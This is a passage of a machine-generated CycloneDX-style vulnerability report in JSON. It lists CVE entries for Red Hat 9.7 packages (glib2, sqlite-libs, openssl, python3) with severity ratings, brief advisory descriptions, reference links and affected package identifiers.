} }, { "id": "CVE-2025-7039", "ratings": [ { "source": { "name": "azure" }, "severity": "low" }, { "source": { "name": "cbl-mariner" }, "severity": "low" }, { "source": { "name": "redhat" }, "score": 3.7, "severity": "low", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N" }, { "source": { "name": "ubuntu" }, "severity": "low" } ], "cwes": [ 22 ], "description": "A flaw was found in glib. An integer overflow during temporary file creation leads to an out-of-bounds memory access, allowing an attacker to potentially perform path traversal or access private temporary file content by creating symbolic links. This vulnerability allows a local attacker to manipulate file paths and access unauthorized data. The core issue stems from insufficient validation of file path lengths during temporary file operations.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2025-7039" }, { "url": "https://access.redhat.com/security/cve/CVE-2025-7039" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2392423" }, { "url": "https://gitlab.gnome.org/GNOME/glib/-/issues/3716" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7039" }, { "url": "https://ubuntu.com/security/notices/USN-7942-1" }, { "url": "https://ubuntu.com/security/notices/USN-7942-2" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2025-7039" } ], "published": "2025-09-03T02:15:38+00:00", "updated": "2026-04-15T00:35:42+00:00", "affects": [ { "ref": "pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "2.68.4-18.el9_7.1", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/glib2@2.68.4-18.el9_7.1?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2025-70873", "ratings": [ { "source": { "name": "azure" }, "severity": "high" }, { "source": { "name": "bitnami" }, "score": 7.5, "severity": "high", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "source": { "name": "photon" }, "severity": "high" }, { "source": { "name": "redhat" }, "score": 3.3, "severity": "low", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N" } ], "cwes": [ 244 ], "description": "An information disclosure issue in the zipfileInflate function in the zipfile extension in SQLite v3.51.1 and earlier allows attackers to obtain heap memory via supplying a crafted ZIP file.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2025-70873" }, { "url": "https://access.redhat.com/security/cve/CVE-2025-70873" }, { "url": "https://gist.github.com/cnwangjihe/f496393f30f5ecec5b18c8f5ab072054" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70873" }, { "url": "https://sqlite.org/forum/forumpost/761eac3c82" }, { "url": "https://sqlite.org/src/info/3d459f1fb1bd1b5e" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2025-70873" } ], "published": "2026-03-12T19:16:15+00:00", "updated": "2026-04-16T21:15:47+00:00", "affects": [ { "ref": "pkg:rpm/redhat/sqlite-libs@3.34.1-9.el9_7?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "3.34.1-9.el9_7", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/sqlite-libs@3.34.1-9.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/sqlite-libs@3.34.1-9.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/sqlite-libs@3.34.1-9.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/sqlite-libs@3.34.1-9.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/sqlite-libs@3.34.1-9.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/sqlite-libs@3.34.1-9.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/sqlite-libs@3.34.1-9.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/sqlite-libs@3.34.1-9.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/sqlite-libs@3.34.1-9.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/sqlite-libs@3.34.1-9.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/sqlite-libs@3.34.1-9.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/sqlite-libs@3.34.1-9.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/sqlite-libs@3.34.1-9.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/sqlite-libs@3.34.1-9.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/sqlite-libs@3.34.1-9.el9_7?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2025-9232", "ratings": [ { "source": { "name": "azure" }, "severity": "medium" }, { "source": { "name": "julia" }, "score": 5.9, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "source": { "name": "photon" }, "severity": "medium" }, { "source": { "name": "redhat" }, "score": 3.1, "severity": "low", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L" }, { "source": { "name": "ubuntu" }, "severity": "low" } ], "cwes": [ 125 ], "description": "Issue summary: An application using the OpenSSL HTTP client API functions may\ntrigger an out-of-bounds read if the 'no_proxy' environment variable is set and\nthe host portion of the authority component of the HTTP URL is an IPv6 address.\n\nImpact summary: An out-of-bounds read can trigger a crash which leads to\nDenial of Service for an application.\n\nThe OpenSSL HTTP client API functions can be used directly by applications\nbut they are also used by the OCSP client functions and CMP (Certificate\nManagement Protocol) client implementation in OpenSSL. However the URLs used\nby these implementations are unlikely to be controlled by an attacker.\n\nIn this vulnerable code the out of bounds read can only trigger a crash.\nFurthermore the vulnerability requires an attacker-controlled URL to be\npassed from an application to the OpenSSL function and the user has to have\na 'no_proxy' environment variable set. For the aforementioned reasons the\nissue was assessed as Low severity.\n\nThe vulnerable code was introduced in the following patch releases:\n3.0.16, 3.1.8, 3.2.4, 3.3.3, 3.4.0 and 3.5.0.\n\nThe FIPS modules in 3.5, 3.4, 3.3, 3.2, 3.1 and 3.0 are not affected by this\nissue, as the HTTP client implementation is outside the OpenSSL FIPS module\nboundary.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2025-9232" }, { "url": "http://www.openwall.com/lists/oss-security/2025/09/30/5" }, { "url": "https://access.redhat.com/security/cve/CVE-2025-9232" }, { "url": "https://cert-portal.siemens.com/productcert/html/ssa-032379.html" }, { "url": "https://cert-portal.siemens.com/productcert/html/ssa-082556.html" }, { "url": "https://cert-portal.siemens.com/productcert/html/ssa-089022.html" }, { "url": "https://cert-portal.siemens.com/productcert/html/ssa-485750.html" }, { "url": "https://github.com/advisories/GHSA-76r2-c3cg-f5r9" }, { "url": "https://github.com/openssl/openssl/commit/2b4ec20e47959170422922eaff25346d362dcb35" }, { "url": "https://github.com/openssl/openssl/commit/654dc11d23468a74fc8ea4672b702dd3feb7be4b" }, { "url": "https://github.com/openssl/openssl/commit/7cf21a30513c9e43c4bc3836c237cf086e194af3" }, { "url": "https://github.com/openssl/openssl/commit/89e790ac431125a4849992858490bed6b225eadf" }, { "url": "https://github.com/openssl/openssl/commit/bbf38c034cdabd0a13330abcc4855c866f53d2e0" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-9232" }, { "url": "https://openssl-library.org/news/secadv/20250930.txt" }, { "url": "https://ubuntu.com/security/notices/USN-7786-1" }, { "url": "https://ubuntu.com/security/notices/USN-7894-1" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2025-9232" } ], "published": "2025-09-30T14:15:41+00:00", "updated": "2026-05-12T13:17:30+00:00", "affects": [ { "ref": "pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1", "versions": [ { "version": "1:3.5.1-7.el9_7", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1", "versions": [ { "version": "1:3.5.1-7.el9_7", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2026-0672", "ratings": [ { "source": { "name": "alma" }, "severity": "high" }, { "source": { "name": "amazon" }, "severity": "high" }, { "source": { "name": "azure" }, "severity": "medium" }, { "source": { "name": "cbl-mariner" }, "severity": "medium" }, { "source": { "name": "oracle-oval" }, "severity": "high" }, { "source": { "name": "redhat" }, "score": 4.8, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:N/I:H/A:N" }, { "source": { "name": "rocky" }, "severity": "high" }, { "source": { "name": "ubuntu" }, "severity": "medium" } ], "cwes": [ 93 ], "description": "When using http.cookies.Morsel, user-controlled cookie values and parameters can allow injecting HTTP headers into messages. Patch rejects all control characters within cookie names, values, and parameters.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-0672" }, { "url": "https://access.redhat.com/errata/RHSA-2026:10950" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-0672" }, { "url": "https://bugzilla.redhat.com/2395108" }, { "url": "https://bugzilla.redhat.com/2408891" }, { "url": "https://bugzilla.redhat.com/2418084" }, { "url": "https://bugzilla.redhat.com/2431366" }, { "url": "https://bugzilla.redhat.com/2431374" }, { "url": "https://bugzilla.redhat.com/2444691" }, { "url": "https://bugzilla.redhat.com/2448168" }, { "url": "https://bugzilla.redhat.com/2448181" }, { "url": "https://bugzilla.redhat.com/2457409" }, { "url": "https://bugzilla.redhat.com/2457932" }, { "url": "https://bugzilla.redhat.com/2458049" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2395108" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2408891" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2418084" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431366" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431374" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444691" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448168" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448181" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457409" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457932" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458049" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-13837" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15282" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-59375" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-6075" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0672" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1502" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-2297" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-3644" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4224" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4786" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-6100" }, { "url": "https://errata.almalinux.org/8/ALSA-2026-10950.html" }, { "url": "https://errata.rockylinux.org/RLSA-2026:10950" }, { "url": "https://github.com/python/cpython/commit/62700107418eb2cca3fc88da036a243ea975f172" }, { "url": "https://github.com/python/cpython/commit/712452e6f1d4b9f7f8c4c92ebfcaac1705faa440" }, { "url": "https://github.com/python/cpython/commit/7852d72b653fea0199acf5fc2a84f6f8b84eba8d" }, { "url": "https://github.com/python/cpython/commit/918387e4912d12ffc166c8f2a38df92b6ec756ca" }, { "url": "https://github.com/python/cpython/commit/95746b3a13a985787ef53b977129041971ed7f70" }, { "url": "https://github.com/python/cpython/commit/b1869ff648bbee0717221d09e6deff46617f3e85" }, { "url": "https://github.com/python/cpython/issues/143919" }, { "url": "https://github.com/python/cpython/pull/143920" }, { "url": "https://linux.oracle.com/cve/CVE-2026-0672.html" }, { "url": "https://linux.oracle.com/errata/ELSA-2026-10950.html" }, { "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/6VFLQQEIX673KXKFUZXCUNE5AZOGZ45M/" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0672" }, { "url": "https://ubuntu.com/security/notices/USN-8018-1" }, { "url": "https://ubuntu.com/security/notices/USN-8018-3" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-0672" } ], "published": "2026-01-20T22:15:52+00:00", "updated": "2026-04-15T00:35:42+00:00", "affects": [ { "ref": "pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7", "versions": [ { "version": "3.9.25-3.el9_7.2", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "3.9.25-3.el9_7.2", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "3.9.25-3.el9_7.2", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": 